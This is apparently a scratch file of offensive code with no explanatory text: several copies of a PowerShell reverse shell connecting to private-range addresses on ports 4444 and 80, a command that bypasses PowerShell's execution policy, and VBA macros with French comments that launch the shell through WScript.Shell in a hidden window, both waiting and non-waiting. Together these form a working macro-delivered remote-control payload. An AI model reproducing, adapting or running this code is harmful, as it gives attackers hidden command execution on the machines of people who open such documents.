$client = New-Object System.Net.Sockets.TCPClient('172.16.95.X',4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }; $client.Close() powershell.exe -NoExit -ExecutionPolicy Bypass -File .\ton_script.ps1 $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() Sub RunMultiLinePS_Inline() Dim objShell As Object Set objShell = CreateObject("WScript.Shell") objShell.Run "powershell.exe -Command ""$msg = 'Hello'; $date = Get-Date; Write-Output $msg; Write-Output $date""" Set objShell = Nothing End Sub Sub ExecuterReverseShell() Dim psCommand As String Dim wsh As Object ' Le script PowerShell à exécuter psCommand = "$client = New-Object System.Net.Sockets.TCPClient('172.16.95.129',4444);" & "$stream = $client.GetStream();" & "[byte[]]$bytes = 0..65535|%{0};" & "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;" & "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);" & "$sendback = (iex ""."" { $data } 2>&1"" | Out-String );" & "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';" & "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);" & "$stream.Write($sendbyte,0,$sendbyte.Length);" & "$stream.Flush()};" & "$client.Close()" ' Crée un objet WScript.Shell Set wsh = CreateObject("WScript.Shell") ' Exécute PowerShell avec la commande wsh.Run "powershell.exe -WindowStyle Hidden -Command ""& {" & psCommand & "}""", 0, True ' Libère l'objet Set wsh = Nothing End Sub Sub ExecuterReverseShellAsync() Dim psCommand As String Dim wsh As Object ' Le script PowerShell à exécuter psCommand = "$client = New-Object System.Net.Sockets.TCPClient('172.16.95.129',4444);" & "$stream = $client.GetStream();" & "[byte[]]$bytes = 0..65535|%{0};" & "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;" & "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);" & "$sendback = (iex ""."" { $data } 2>&1"" | Out-String );" & "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';" & "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);" & "$stream.Write($sendbyte,0,$sendbyte.Length);" & "$stream.Flush()};" & "$client.Close()" ' Crée un objet WScript.Shell Set wsh = CreateObject("WScript.Shell") ' Exécute PowerShell en arrière-plan (asynchrone) ' Le dernier paramètre est False pour ne pas attendre la fin wsh.Run "powershell.exe -WindowStyle Hidden -Command ""& {" & psCommand & "}""", 0, False ' Libère l'objet Set wsh = Nothing End Sub $sendback = (Invoke-Expression $data 2>&1 | Out-String)